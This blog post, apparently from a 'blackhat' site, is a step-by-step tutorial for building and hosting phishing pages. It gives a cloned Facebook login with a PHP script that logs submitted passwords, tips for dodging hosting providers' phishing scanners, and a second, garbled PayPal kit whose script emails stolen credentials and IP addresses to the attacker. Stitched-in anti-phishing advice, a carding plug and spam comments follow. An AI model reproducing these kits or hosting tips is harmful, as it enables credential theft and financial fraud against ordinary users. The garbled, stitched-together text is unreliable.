How to Code Scam Page

A scam page is a fake webpage. e.g. login to a popular website, online bank login and etc. depending on what it is. scam pages are used by spammers to collect data on people who get scammed. detecting the scam page is simple if you are technology-oriented. but most common users can’t detect scam page. this is a big problem in the www. some companies are developing software to combat scams or phishing scams today we will know How to Code Scam Page.

How to Creat Scam page?

Recently I have come across many guides about creating phishing pages. Although the principles behind each guide are similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy for that we writing How to Code Scam Page.

Step 1Download the HTML Index of the Target Webpage

To start off, you need to obtain the HTML index of the page. There are various methods of doing this, there are even templates online for popular sites. In this tutorial, I am going to use the most basic way in order to be as noob-friendly as possible , lets know How to Code Scam Page

Navigate to Your Webpage

In this tutorial, I am going to phish Facebook.

How to code scam page

View the Source of the Webpage.

Depending on your browser, there may be different methods. Normally it is done by right-clicking the site and clicking “View Source”. I have done that on my browser and windows should come out similar to this make sure to research on that more How to Code Scam Page

How to code scam page

On the box to the right is the source of the website. Which leads on to the next step:

Downloading and Saving the Source Code

Select the box, and copy-paste everything in the box to a txt document. Use Notepad on windows, and a simple text editing program if you are not using windows. (Don’t use programs like Word or Pages because it is really slow). After you have done that, click “Save As” or whatever option that allows you to save that document. On Notepad it should look like this:

How to code scam page

Change “Save as type” to All Files and change the encoding to Unicode.
After that, name the document “index.html”, obviously without the speech marks.

How to code scam page

Congratulations! You have finished the first step of the tutorial!

Step 2 Creating a PHP File for Password Harvesting

The PHP file is basically the tool that harvests the users password in this scenario. There are several ways you can create this PHP if you have some programming knowledge, but if you don’t, just copy my exemplar PHP.

<?php
header (‘Location: facebook.com‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n\n\n\n”);
fclose($handle);
exit;
?>

Same as above, save the PHP file as “All Files” and as “post.php”. Change the encoding to Unicode and you should be ready to go!

Step 3 Modify the Page HTML File to Incorporate Your PHP File in It.

Now, we need to incorporate our PHP file, to receive passwords that the users send.

Find the Password-Sending Method

First, you need to see how the website deals when the user submits a username-password.
For Facebook, all you need to do is to Ctrl-F and type “=action” in the field.https://0ba65e4a67cb4f162092f4edc8bf9129.safeframe.googlesyndication.com/safeframe/1-0-37/html/container.html

How to code scam page

Now, you need to replace everything in the underlined portion with “post.php”, keep the speech marks. (just one set please).

Obviously, this method will be different for other websites. A good method to find it is by using Inspect Elements tool in most modern browsers and clicking on the login button. Find something similar to the above method.

Please note: You will need to change this later when you actually host the website How to Code Scam Page.

Step 4 Hosting the PHP File for Password Storing

Now here is the juicy part, making your fake website online so other people can browse it.

You can use any free hosting services to host and store passwords. However, the hosting plan has to include something called “FTP”. For this tutorial, I will be using 000webhost.

Navigate to the FTP Server for Your Web Hosting Service

For this step, I assume that you have already created a website with your hosting service.https://0ba65e4a67cb4f162092f4edc8bf9129.safeframe.googlesyndication.com/safeframe/1-0-37/html/container.html

For 000webhost, you simply click on “File manager” and click “Upload Files”. Here is a picture of the FTP server for 000webhost:

How to code scam page

Ignore the other files, those are just some of my personal stuff, unrelated to this tutorial.

Upload Your PHP Files and Change Permission

As you can see, I have already uploaded my PHP file. But you need to just upload it to the main folder of your FTP server. (Some FTP server doesn’t allow you to upload to the root folder, just follow their particular instructions).

Now you need to change the permission to “777”, which is basically every single permission. When prompted to tick boxes for the permissions, just tick every single one.

Now you can close the FTP server. Note down your web address!

Step 5 Hosting the Actual Phishing Page

For this step, you will need to use the exact hosting provider that I use, otherwise you will get banned.https://0ba65e4a67cb4f162092f4edc8bf9129.safeframe.googlesyndication.com/safeframe/1-0-37/html/container.html

There is a reason why I don’t use the same hosting provider for my actual page, and that is because most hosting providers will employ some kind of scanning to detect phishing pages. I can tried multiple hosting services in the past and all of them banned me within 30 mins of uploading the index file.

Configuring the post.php Forum

Now, before you host the website, remember the post.php/login form thing we configured above?

You need to find the login form thing again in your index.html and replace the “post.php” with “http://yourwebsiteforyourpostphpupload/post.php”, assuming that you uploaded to the root folder. Remember to add HTTP:// in front of the site. In order to test this, navigate to the website (http://yourwebsiteforyourpostphpupload/post.php) and see if it redirects you to Facebook.com, if it does then you have pasted the correct site. If it doesn’t, then double-check if you have uploaded your file to the correct directory How to Code Scam Page.

Hosting the Actual Page

Navigate to htmlpasta.com. You will see something similar to this:

How to code scam page

Then, you need to copy the index.html file for your phishing site and paste it in here.

How to code scam page

Now, click on the reCAPTCHA and click paste, you will get a link for your website.

Step 6 Congratulations!

Congrats! You have finished hosting your first phishing site! Navigate to your site and try to enter some fake login details, after you click the login button, it should redirect you to facebook.com. Login to your FTP server that you hosted your post.php file, and there should be a new document called Log.txt that is stored within the same folder as your post.php file. Any login details should be stored there.

Remember, please do not use this for malicious purpose, only use for penetration testing and with authorisation from your victims.

If you have any question then please comment down below.

phishing is the term usedfor this scam.1] OK, so first we choose a target.We chose www.paypal.com2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.3] We open … There might be a problem, namely the way the image.4] If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path 5] Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F … (Here the words are different .. try and password, password, username, etc.. Dak login does not work).6] You have a code like <form action=”login2.php”>. Login2.php change in 040147.php!7] Now, the username should be a code like . name = “email” tells us that in PHP script authentication is the variable that you email username.8] Good memory.The password, the code should be similar ( ). So, password is held in variable password. A and memorize it.9] Now, where you have saved. Html, created a new file called 040147.php.In it, add the following code:Code:$ To = “upgoingstar@gmail.com”$ Name = $ _POST [’email’];$ Email = $ _POST [’email’];$ Subject = $ _POST [‘subject’];$ Password = $ _POST [‘password’];$ Agent = $ _SERVER [‘HTTP_USER_AGENT’];$ Ip = $ _SERVER [‘REMOTE_ADDR’];$ D = date (‘l dS \ of F Y h: i: s A’);$ Sub = “New Account Hacked PayPal – $ email”;$ Headers = “From: $ name <$ email> \ n”;$ Headers .= “Content-Type: text / plain, charset = iso-8859-1 \ n”;$ Mes .= ‘Username:’. $ Email. “\ N”;$ Msg .= “Password:”. $ Password. “\ N”;$ Msg .= “Browser:”. $ Agent. “\ N”;$ Msg .= “IP:”. $ Ip. “\ N”;$ Mes .= ‘Date and time:’. $ D;(mail ($ to, $ sub, $ mes, $ headers);header (“Location: www.paypal.com“);)?>10] Modify codeCode:$ To = “flowbuzltd@gmail.com”and put your mail. The code above variables over email and password and sends them together with some more useful details.11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink:YOUR SCAMPAGE IS READY NOW. ENJOY SPAMMING 😉

How does this scam work?

A scammer contacts you pretending to be from a legitimate business such a bank, telephone or internet service provider. You may be contacted by email, social media, phone call, or text message.Clues for spotting a fake email

The scammer asks you to provide or confirm your personal details. For example, the scammer may say that the bank or organisation is verifying customer records due to a technical error that wiped out customer data. Or, they may ask you to fill out a customer survey and offer a prize for participating.

Alternatively, the scammer may alert you to ‘unauthorised or suspicious activity on your account’. You might be told that a large purchase has been made in a foreign country and asked if you authorised the payment. If you reply that you didn’t, the scammer will ask you to confirm your credit card or bank details so the ‘bank’ can investigate. In some cases the scammer may already have your credit card number and ask you to confirm your identity by quoting the 3 or 4 digit security code printed on the card.

Phishing messages are designed to look genuine, and often copy the format used by the organisation the scammer is pretending to represent, including their branding and logo. They will take you to a fake website that looks like the real deal, but has a slightly different address. For example, if the legitimate site is ‘www.realbank.com.au’, the scammer may use an address like ‘www.reallbank.com’.

If you provide the scammer with your details online or over the phone, they will use them to carry out fraudulent activities, such as using your credit cards and stealing your money.

Spamming is the use of messaging systems to send an unsolicited message (spam) to large numbers of recipients for the purpose of commercial advertising, for the purpose of non-commercial proselytizing, or for any prohibited purpose (especially the fraudulent purpose of phishing). While the most widely recognized form of spam is email spam, the term is applied to similar abuses in other media: instant messaging spam, Usenet newsgroup spam, Web search engine spam, spam in blogs, wiki spam, online classified ads spam, mobile phone messaging spam, Internet forum spam, junk fax transmissions, social spam, spam mobile apps,[1] television advertising and file sharing spam. It is named after Spam, luncheon meat, by way of a Monty Python sketch about a restaurant that has Spam in almost every dish and where Vikings annoyingly sing “Spam” over and over again.[2]

Spamming remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, servers, infrastructures, IP ranges, and domain names, and it is difficult to hold senders accountable for their mass mailings. The costs, such as lost productivity and fraud, are borne by the public and by Internet service providers, which have added extra capacity to cope with the volume. Spamming has been the subject of legislation in many jurisdictions.

A person who creates spam is called a spammer.

Mobile phone

 Mobile phone spam

Mobile phone spam is directed at the text messaging service of a mobile phone. This can be especially irritating to customers not only for the inconvenience but also because of the fee they may be charged per text message received in some markets. To comply with CAN-SPAM regulations in the US, SMS messages now must provide options of HELP and STOP, the latter to end communication with the advertiser via SMS altogether.

Despite the high number of phone users, there has not been so much phone spam, because there is a charge for sending SMS. Recently, there are also observations of mobile phone spam delivered via browser push notifications. These can be a result of allowing websites which are malicious or delivering malicious ads to send a user notifications.[

Social networking spam

Main article: Social networking spam

Facebook and Twitter are not immune to messages containing spam links. Spammers hack into accounts and send false links under the guise of a user’s trusted contacts such as friends and family. As for Twitter, spammers gain credibility by following verified accounts such as that of Lady Gaga; when that account owner follows the spammer back, it legitimizes the spammer. Twitter has studied what interest structures allow their users to receive interesting tweets and avoid spam, despite the site using the broadcast model, in which all tweets from a user are broadcast to all followers of the user. Spammers, out of malicious intent, post either unwanted (or irrelevant) information or spread misinformation on social media platforms How to Code Scam Page.

Social spam

Spreading beyond the centrally managed social networking platforms, user-generated content increasingly appears on business, government, and nonprofit websites worldwide. Fake accounts and comments planted by computers programmed to issue social spam can infiltrate these websites.

Blog, wiki, and guestbook

Main article: Spam in blogs

Blog spam is spamming on weblogs. In 2003, this type of spam took advantage of the open nature of comments in the blogging software Movable Type by repeatedly placing comments to various blog posts that provided nothing more than a link to the spammer’s commercial web site.[30] Similar attacks are often performed against wikis and guestbooks, both of which accept user contributions. Another possible form of spam in blogs is the spamming of a certain tag on websites such as Tumblr.

How to Code Scam Page

  • Whaling and spear-phishing – the scammer targets a business in an attempt to get confidential information for fraudulent purposes. To make their request appear legitimate, they use details and information specific to the business that they have obtained elsewhere.
  • Pharming – the scammer redirects you to a fake version of a legitimate website you are trying to visit. This is done by infecting your computer with malware which causes you to be redirected to the fake site, even if you type the real address or click on your bookmarked link.

Warning signs

  • You receive an email, text, or phone call claiming to be from a bank, telecommunications provider, or other business you regularly deal with, asking you to update or verify your details.
  • The email or text message does not address you by your proper name and may contain typing errors and grammatical mistakes.
  • The website address does not look like the address you usually use and is requesting details the legitimate site does not normally ask for.
  • You notice new icons on your computer screen, or your computer is not as fast as it normally is How to Code Scam Page

Protect yourself

  • Always keep your computer security up to date with anti-virus and anti-spyware software, and a good firewall. Only buy a computer and anti-virus software from a reputable source.
  • Use your security software to run a virus check if you think your computer’s security has been compromised. If you still have doubts, contact your anti-virus software provider or a computer specialist.
  • Secure your networks and devices, and avoid using public computers or WiFi hotspots to access or provide personal information.
  • Choose passwords and PINs that would be difficult for others to guess, and update them regularly. Do not save them on your phone or computer.
  • Do not open attachments or click on links in emails or social media messages you’ve received from strangers – just press delete.
  • Be wary of free downloads and website access, such as music, games, movies and adult sites. They may install harmful programs without you knowing.
  • Do not use software that auto-completes online forms.
  • Visit Stay Smart Online for tips on how to protect your personal and financial information online.

If you are interested to learn Pubg Uc Carding then visit here Pubg UC carding Method

Subscribe our Youtube Channel Blackhat Pakistan Here.

10 thoughts on “How to Code Scam Page”

  1. Thanks a bunch for sharing this with all of us you really
    recognize what you’re talking approximately!

    Bookmarked. Kindly also seek advice from my website =).
    We could have a hyperlink change contract among us

    Reply
  2. Aw, this was a really good post. Finding the time and actual effort to create a really good article… but what can I say…
    I hesitate a whole lot and never seem to get nearly anything done.

    Reply
  3. It’s really a great and helpful piece of information. I am satisfied that you shared this useful information with us.
    Please stay us informed like this. Thank you for sharing.

    Reply
  4. I used to be recommended this website via my cousin. I’m not sure whether or
    not this post is written by way of him as nobody else recognize such unique approximately my difficulty.
    You’re amazing! Thanks!

    Reply

Leave a Comment